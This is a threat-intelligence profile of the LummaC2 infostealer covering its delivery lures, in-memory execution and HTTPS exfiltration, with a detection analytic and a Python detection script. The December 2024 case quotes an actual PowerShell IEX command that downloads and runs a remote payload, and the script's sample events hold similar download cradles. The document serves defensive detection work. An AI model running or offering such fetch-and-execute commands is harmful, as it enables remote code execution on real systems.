The most popular infostealer of 2024, LummaC2 exemplifies the advantages of using a malware-as-a-service (MaaS) model.
LummaC2, also known as LummaC or Lumma Stealer, is a MaaS stealer that has been available for purchase on underground forums since at least mid-2022. Subscriptions start at $250 USD per month and range up to a one-time payment of $20,000 USD for access to the Lumma source code. Adversaries favor the MaaS model because it lets them launch operations with relative ease and low overhead, giving them access to effective malware like LummaC2 along with continuous development, customer support, and a range of features.
Because it’s distributed as a MaaS offering, LummaC2 is used against many targets opportunistically, with no particular industry or geography being an exclusive recipient.
Similar to other stealers, LummaC2 was initially designed to target cryptocurrency wallets, browser information, and 2FA tokens, but it has expanded beyond its original scope. It remains in active development, and over time has added features including customizable stealer configurations and a loader capability for delivering additional payloads via EXE, DLL, or PowerShell.
As it has grown in popularity over the past year, LummaC2 has posed a major threat against organizations large and small, as the stealer exposes credentials for user identities, allowing adversaries to gain initial access to organizations using valid accounts.
Initial access indicators of compromise (IOC) vary according to the delivery method and loader chosen by the adversary, so early detection telemetry differs from case to case. LummaC2 delivery vehicles have been presented to users in an array of creative ways, including:
Adversaries have also used LummaC2 to deliver PrivateLoader, Amadey, and NetSupport Manager.
We described LummaC2’s paste-and-run tactic in our November 2024 Intelligence Insights.
In December 2024 we saw a LummaC2 threat that began with the victim interacting with a fake CAPTCHA-style paste-and-run lure hosted at solve.gevaq[.]com. Successful paste-and-run execution resulted in mshta.exe reaching out to deduhko2.klipzyroloo[.]shop to retrieve an encoded PowerShell script. That script in turn pulled down and executed additional remote resources from deduhko[.]klipzyroloo[.]shop with the command:
"powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command & {IEX ((New-Object Net.WebClient).DownloadString('hxxps[://]deduhko.klipzyroloo[.]shop/Grpc.eml'))}
The downloaded content at Grpc.eml was about 18 MB in size, which can indicate a large amount of embedded content, such as one or more embedded executable files. This LummaC2 configuration appears to use Grpc.eml as the process injection source, targeting a powershell.exe instance launched with no command-line arguments and using its memory space for the next phases of LummaC2 execution.
The above LummaC2 execution is very different from one we observed in November 2024 and previously shared, illustrating the variety of observable behaviors and artifacts that can be seen in different LummaC2 configurations.
Behavioral detection of LummaC2 can vary quite a bit, since the operation requires its distributors to wrap the stealer in a crypter. Multiple detection analytics may catch LummaC2 simply because an adversary configured the crypter in a particular way. Crypters we've observed paired with LummaC2 include PureCrypter and CypherIT.
Depending on the delivery method and adversary configuration, LummaC2 may be injected into a hollowed process (we've observed OpenWith.exe and more.com, among others) or leverage DLL side-loading for execution. The stealer activity occurs in memory with direct exfiltration to C2; however, in some cases collected data may be staged in text files like System.txt before being ZIP-archived for theft, so looking for C2 activity or suspicious TXT file creation may also help detect LummaC2. LummaC2 does not maintain persistence on its own, but accompanying loaders or follow-on payloads may create and maintain persistence.
LummaC2 relies on HTTPS to exfiltrate data to adversary systems. Between late 2023 and early 2024, the stealer's developers migrated its exfiltration from plaintext HTTP to HTTPS in an effort to evade network-based detection controls. Along with encrypting its communications with HTTPS, LummaC2's developers also leverage Cloudflare services to make their exfiltration systems resilient and highly available.
As the stealer matured in 2024, LummaC2 incorporated more features to stay on the bleeding edge of the stealer market. To ensure data is exfiltrated even if the operation is interrupted, the developers added functionality to send information piecemeal rather than following the usual "collect, stage, send" pattern. In addition, when Google implemented application-bound encryption (ABE) in Chromium-based browsers, LummaC2 quickly adopted new techniques to obtain browser cookies and bypass ABE.
Because LummaC2 has been distributed in so many different ways, preventive measures can take many forms. We've observed LummaC2 distributed via malicious advertisements, fake software installers, paste-and-run campaigns, and more, and we've observed it delivered both in script form and via DLL side-loading.
General preventative measures that apply to multiple malware families also help fight against LummaC2:
For response, an excellent playbook would look something like this:
PowerShell using invoke-expression to download content

This pseudo-detection analytic identifies instances of PowerShell using invoke-expression to download content from an HTTP URL. Adversaries attempting to deliver threats like LummaC2 use this function to download remotely hosted scripts and code for further exploitation of an endpoint. Note that legitimate package management and orchestration utilities like Chocolatey may use this function to update themselves.
Note: * is a placeholder for strings associated with legitimate use of this function in your environment
process == (powershell)
&&
(deobfuscated_command_line_includes (iex)
||
deobfuscated_command_line_includes ('.invoke' || 'invoke-expression'))
&&
deobfuscated_command_line_includes (http)
&&
command_line_does_not_include == (*)
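The analytic above, and the December 2024 Grpc.eml case described earlier, as an added runnable example written for this page (it is not Red Canary's code, nor anything taken from LummaC2 itself): it applies the pseudo-analytic to constructed process-creation events, including a best-effort deobfuscation step for -EncodedCommand payloads and backtick escapes, and adds one extra heuristic for a powershell.exe launched with no arguments by another PowerShell process, the shape of the injection target in the Grpc.eml case. The event field names, the inclusion of pwsh.exe, the allowlist strings, the example.invalid host, and every sample event are assumptions.

```python
"""Detection logic for the IEX-download analytic above, as an added example.

Illustrative code written for this page, not Red Canary's or LummaC2's.
The event field names (image, parent_image, command_line), the pwsh.exe
match, the allowlist strings and all sample events are assumptions.
"""
import base64
import re

# The page's "*" placeholder: strings tied to legitimate IEX download cradles
# in a hypothetical environment. Tune this per environment.
ALLOWLIST = ("chocolatey.org", "choco.exe")

# -e, -ec, -enc, -EncodedCommand and the other prefixes PowerShell accepts,
# followed by the base64 payload. "-ExecutionPolicy" does not match because
# 'x' is outside the character class.
_ENCODED_FLAG = re.compile(r"-e[ncodedma]*\s+([A-Za-z0-9+/=]+)", re.I)


def deobfuscate(command_line: str) -> str:
    """Approximate the analytic's 'deobfuscated_command_line': append any
    decoded -EncodedCommand payload (base64 of UTF-16LE), strip PowerShell
    backtick escapes such as i`e`x, and lower-case the result."""
    text = command_line
    for match in _ENCODED_FLAG.finditer(command_line):
        try:
            text += " " + base64.b64decode(match.group(1), validate=True).decode("utf-16-le")
        except (ValueError, UnicodeDecodeError):
            continue  # not real base64; leave the raw token in place
    return text.replace("`", "").lower()


def is_powershell(image: str) -> bool:
    # Assumption: treat pwsh.exe like powershell.exe for this analytic.
    return image.lower().endswith(("powershell.exe", "pwsh.exe"))


def iex_download_cradle(event: dict) -> bool:
    """process == powershell && (iex || .invoke || invoke-expression)
    && http && command line not allowlisted."""
    if not is_powershell(event["image"]):
        return False
    cmd = deobfuscate(event["command_line"])
    uses_iex = (re.search(r"\biex\b", cmd) is not None
                or ".invoke" in cmd or "invoke-expression" in cmd)
    fetches_http = "http" in cmd
    allowlisted = any(s in cmd for s in ALLOWLIST)
    return uses_iex and fetches_http and not allowlisted


def blank_powershell_child(event: dict) -> bool:
    """Added heuristic (not the page's analytic): a powershell.exe launched
    with no command-line arguments by another PowerShell process, the shape
    of the process Grpc.eml was injected into in the December 2024 case."""
    if not (is_powershell(event["image"]) and is_powershell(event.get("parent_image", ""))):
        return False
    # With quotes stripped, a no-argument launch is just the image path.
    return event["command_line"].strip().strip('"').lower().endswith("powershell.exe")


ANALYTICS = (("iex_download_cradle", iex_download_cradle),
             ("blank_powershell_child", blank_powershell_child))

PS_PATH = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"


def _encoded(script: str) -> str:
    """Build an -EncodedCommand payload the way PowerShell expects it."""
    return base64.b64encode(script.encode("utf-16-le")).decode()


# Constructed process-creation events; example.invalid is a placeholder host.
SAMPLE_EVENTS = [
    {"id": "cradle-plain", "image": PS_PATH, "parent_image": r"C:\Windows\System32\mshta.exe",
     "command_line": '"powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command & '
                     "{IEX ((New-Object Net.WebClient).DownloadString('https://example.invalid/Grpc.eml'))}"},
    {"id": "cradle-encoded", "image": PS_PATH, "parent_image": r"C:\Windows\System32\cmd.exe",
     "command_line": "powershell.exe -NoProfile -enc "
                     + _encoded("IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')")},
    {"id": "cradle-backtick", "image": PS_PATH, "parent_image": r"C:\Windows\explorer.exe",
     "command_line": "powershell -c \"i`e`x (New-Object Net.WebClient).DownloadString('http://example.invalid/x')\""},
    {"id": "choco-allowlisted", "image": PS_PATH, "parent_image": r"C:\Windows\System32\cmd.exe",
     "command_line": "powershell -NoProfile -Command \"iex ((New-Object Net.WebClient)"
                     ".DownloadString('https://community.chocolatey.org/install.ps1'))\""},
    {"id": "benign-script", "image": PS_PATH, "parent_image": r"C:\Windows\explorer.exe",
     "command_line": r"powershell.exe -File C:\scripts\backup.ps1"},
    {"id": "blank-child", "image": PS_PATH, "parent_image": PS_PATH,
     "command_line": f'"{PS_PATH}"'},
]


def run(events=SAMPLE_EVENTS) -> dict:
    """Map each event id to the names of the analytics that fired on it."""
    return {e["id"]: [name for name, fn in ANALYTICS if fn(e)] for e in events}


if __name__ == "__main__":
    for event_id, hits in run().items():
        print(f"{event_id:18} -> {hits or 'no detection'}")
```

The deobfuscation step here stands in for the "deobfuscated_command_line" field that an EDR product typically supplies; if your telemetry already provides it, feed that field in directly. The allowlist is the only tuning knob and should hold narrow strings (a vendor hostname, an installer path) rather than anything an adversary can trivially include in their own command line.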
The following Atomic Red Team tests may help you validate your coverage for behavior related to LummaC2.